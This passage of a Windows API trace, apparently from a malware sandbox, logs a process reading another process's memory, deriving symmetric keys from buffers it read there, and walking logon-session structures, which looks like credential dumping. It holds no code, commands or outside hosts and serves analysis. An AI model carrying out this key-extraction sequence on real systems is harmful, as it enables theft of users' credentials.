lpNumberOfBytesRead=0x0) returned 1 [0038.144] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.144] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.144] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.144] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcfc00e0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.144] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.144] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.144] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.144] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcfc00e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.145] LocalFree (hMem=0x4bc170) returned 0x0 [0038.145] LocalFree (hMem=0x4bad20) returned 0x0 [0038.145] LocalFree (hMem=0x4bc150) returned 0x0 [0038.145] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x176950, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.145] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.145] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.145] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0038.145] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x174448, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.145] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefab10000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.145] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.145] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.145] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.145] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefab100f0, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.145] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.145] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.146] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.146] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefab100f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.146] LocalFree (hMem=0x4bc150) returned 0x0 [0038.146] LocalFree (hMem=0x4bad20) returned 0x0 [0038.146] LocalFree (hMem=0x4b8320) returned 0x0 [0038.146] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x176860, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.146] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.146] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.146] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.146] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x174498, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.146] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefab00000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.146] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.146] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.146] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.146] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefab000f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.146] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.147] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.147] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.147] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefab000f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.147] LocalFree (hMem=0x4bc170) returned 0x0 [0038.147] LocalFree (hMem=0x4bad20) returned 0x0 [0038.147] LocalFree (hMem=0x4bc150) returned 0x0 [0038.147] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x176a40, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.147] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.147] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.147] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0038.147] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x174768, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.147] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefb260000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.147] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.147] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.147] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.147] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefb2600e0, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.148] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.148] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.148] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.148] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefb2600e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.148] LocalFree (hMem=0x4bc150) returned 0x0 [0038.148] LocalFree (hMem=0x4bad20) returned 0x0 [0038.148] LocalFree (hMem=0x4b8320) returned 0x0 [0038.148] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x176c20, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.148] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.148] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.148] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.148] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x174858, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.148] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc3c0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.149] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.149] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.149] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.149] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc3c00e8, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.149] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.149] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.149] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.149] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc3c00e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.149] LocalFree (hMem=0x4bc170) returned 0x0 [0038.149] LocalFree (hMem=0x4bad20) returned 0x0 [0038.149] LocalFree (hMem=0x4bc150) returned 0x0 [0038.149] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x176d10, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.149] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.150] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.150] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.150] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1748a8, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.150] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd020000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.150] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.150] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.151] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.151] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0200f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.151] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.151] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.151] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.151] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0200f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.151] LocalFree (hMem=0x4bc170) returned 0x0 [0038.151] LocalFree (hMem=0x4bad20) returned 0x0 [0038.151] LocalFree (hMem=0x4bc150) returned 0x0 [0038.151] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1773a0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.151] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.151] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.151] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0038.151] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1d8488, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.151] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc2b0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.152] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.152] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.152] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.152] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc2b00e8, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.152] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.152] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.152] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.152] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc2b00e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.152] LocalFree (hMem=0x4bc150) returned 0x0 [0038.152] LocalFree (hMem=0x4bad20) returned 0x0 [0038.152] LocalFree (hMem=0x4b8320) returned 0x0 [0038.152] NtQueryInformationProcess (in: ProcessHandle=0x60, ProcessInformationClass=0x1a, ProcessInformation=0x31f928, ProcessInformationLength=0x8, ReturnLength=0x31f990 | out: ProcessInformation=0x31f928, ReturnLength=0x31f990) returned 0x0 [0038.152] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.152] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.152] LocalAlloc (uFlags=0x40, uBytes=0x167000) returned 0x1d00040 [0038.153] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcc90000, lpBuffer=0x1d00040, nSize=0x167000, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x1d00040*, lpNumberOfBytesRead=0x0) returned 1 [0038.937] LocalFree (hMem=0x1d00040) returned 0x0 [0038.946] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcd35ada, lpBuffer=0x31fb90, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fb90*, lpNumberOfBytesRead=0x0) returned 1 [0038.946] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcd35ac3, lpBuffer=0x31fb90, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fb90*, lpNumberOfBytesRead=0x0) returned 1 [0038.946] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.946] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.946] LocalAlloc (uFlags=0x40, uBytes=0x167000) returned 0x1d00040 [0038.947] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcc90000, lpBuffer=0x1d00040, nSize=0x167000, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x1d00040*, lpNumberOfBytesRead=0x0) returned 1 [0038.999] LocalFree (hMem=0x1d00040) returned 0x0 [0039.007] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefccffc17, lpBuffer=0x31fb90, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fb90*, lpNumberOfBytesRead=0x0) returned 1 [0039.007] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcddc840, lpBuffer=0x13f070960, nSize=0x10, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x13f070960*, lpNumberOfBytesRead=0x0) returned 1 [0039.007] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.008] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.008] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4b8320 [0039.008] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefccffb9f, lpBuffer=0x31fb10, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fb10*, lpNumberOfBytesRead=0x0) returned 1 [0039.008] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcddc830, lpBuffer=0x31fb30, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fb30*, lpNumberOfBytesRead=0x0) returned 1 [0039.009] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x490000, lpBuffer=0x31fac0, nSize=0x20, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fac0*, lpNumberOfBytesRead=0x0) returned 1 [0039.009] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x490020, lpBuffer=0x4b8320, nSize=0x20, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0039.009] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.009] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.009] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0039.009] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x49003c, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0039.009] BCryptGenerateSymmetricKey (in: hAlgorithm=0x4bb4f0, phKey=0x13f070988, pbKeyObject=0x4bb610, cbKeyObject=0x1fa, pbSecret=0x4bc150, cbSecret=0x18, dwFlags=0x0 | out: hAlgorithm=0x4bb4f0, phKey=0x13f070988, pbKeyObject=0x4bb610) returned 0x0 [0039.009] LocalFree (hMem=0x4bc150) returned 0x0 [0039.010] LocalFree (hMem=0x4b8320) returned 0x0 [0039.010] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.010] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.010] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4b8320 [0039.010] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefccffbf5, lpBuffer=0x31fb10, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fb10*, lpNumberOfBytesRead=0x0) returned 1 [0039.010] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcde14b0, lpBuffer=0x31fb30, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fb30*, lpNumberOfBytesRead=0x0) returned 1 [0039.010] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x490200, lpBuffer=0x31fac0, nSize=0x20, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fac0*, lpNumberOfBytesRead=0x0) returned 1 [0039.010] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x490220, lpBuffer=0x4b8320, nSize=0x20, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0039.010] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.011] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.011] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4bc150 [0039.011] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x49023c, lpBuffer=0x4bc150, nSize=0x10, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0039.011] BCryptGenerateSymmetricKey (in: hAlgorithm=0x4bbd80, phKey=0x13f070948, pbKeyObject=0x4bbea0, cbKeyObject=0x26e, pbSecret=0x4bc150, cbSecret=0x10, dwFlags=0x0 | out: hAlgorithm=0x4bbd80, phKey=0x13f070948, pbKeyObject=0x4bbea0) returned 0x0 [0039.011] LocalFree (hMem=0x4bc150) returned 0x0 [0039.011] LocalFree (hMem=0x4b8320) returned 0x0 [0039.011] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcdd97c0, lpBuffer=0x31fd70, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fd70*, lpNumberOfBytesRead=0x0) returned 1 [0039.011] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.011] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.011] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0039.011] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcddd440, lpBuffer=0x31fd10, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fd10*, lpNumberOfBytesRead=0x0) returned 1 [0039.012] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1a1400, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0039.012] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.012] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.012] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4b8320 [0039.012] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1762d0, lpBuffer=0x4b8320, nSize=0x20, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0039.012] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.012] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.012] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8350 [0039.012] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1c16a0, lpBuffer=0x4b8350, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8350*, lpNumberOfBytesRead=0x0) returned 1 [0039.013] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1b9431, lpBuffer=0x31fd68, nSize=0x1, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fd68*, lpNumberOfBytesRead=0x0) returned 1 [0039.013] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.013] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.013] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4bc150 [0039.013] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1b9430, lpBuffer=0x4bc150, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0039.013] GetComputerNameW (in: lpBuffer=0x31fa10, nSize=0x31fc48 | out: lpBuffer="1R6PFH", nSize=0x31fc48) returned 1 [0039.014] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.014] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.014] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8380 [0039.014] StrCmpIW (psz1="NT AUTHORITY", psz2="1R6PFH") returned 1 [0039.018] LocalFree (hMem=0x4b8380) returned 0x0 [0039.018] LocalFree (hMem=0x4b8320) returned 0x0 [0039.018] LocalFree (hMem=0x4b8350) returned 0x0 [0039.018] LocalFree (hMem=0x4bc150) returned 0x0 [0039.019] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1b0ec0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0039.019] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.019] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.019] LocalAlloc (uFlags=0x40, uBytes=0x24) returned 0x4b8350 [0039.019] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x16dfe0, lpBuffer=0x4b8350, nSize=0x24, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8350*, lpNumberOfBytesRead=0x0) returned 1 [0039.019] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.019] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.019] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4bc150 [0039.020] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x186250, lpBuffer=0x4bc150, nSize=0xe, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0039.020] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.020] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.020] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4bc190 [0039.020] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x16e020, lpBuffer=0x4bc190, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc190*, lpNumberOfBytesRead=0x0) returned 1 [0039.020] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x16dfb1, lpBuffer=0x31fd68, nSize=0x1, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fd68*, lpNumberOfBytesRead=0x0) returned 1 [0039.020] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.020] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.020] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x4b8320 [0039.021] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x16dfb0, lpBuffer=0x4b8320, nSize=0x1c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0039.021] GetComputerNameW (in: lpBuffer=0x31fa10, nSize=0x31fc48 | out: lpBuffer="1R6PFH", nSize=0x31fc48) returned 1 [0039.021] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.021] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.021] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4bc1b0 [0039.021] StrCmpIW (psz1="1R6PFH", psz2="1R6PFH") returned 0 [0039.021] LocalFree (hMem=0x4bc1b0) returned 0x0 [0039.021] LocalFree (hMem=0x4b8350) returned 0x0 [0039.021] LocalFree (hMem=0x4bc150) returned 0x0 [0039.021] LocalFree (hMem=0x4bc190) returned 0x0 [0039.021] LocalFree (hMem=0x4b8320) returned 0x0 [0039.021] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1a4540, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0039.022] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.022] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.022] LocalAlloc (uFlags=0x40, uBytes=0x24) returned 0x4b8320 [0039.022] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x16df50, lpBuffer=0x4b8320, nSize=0x24, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0039.022] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.022] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.022] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4bc190 [0039.022] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1860b0, lpBuffer=0x4bc190, nSize=0xe, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc190*, lpNumberOfBytesRead=0x0) returned 1 [0039.022] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0039.023] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0039.023] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4bc150 [0039.023] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x16df90, lpBuffer=0x4bc150, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, 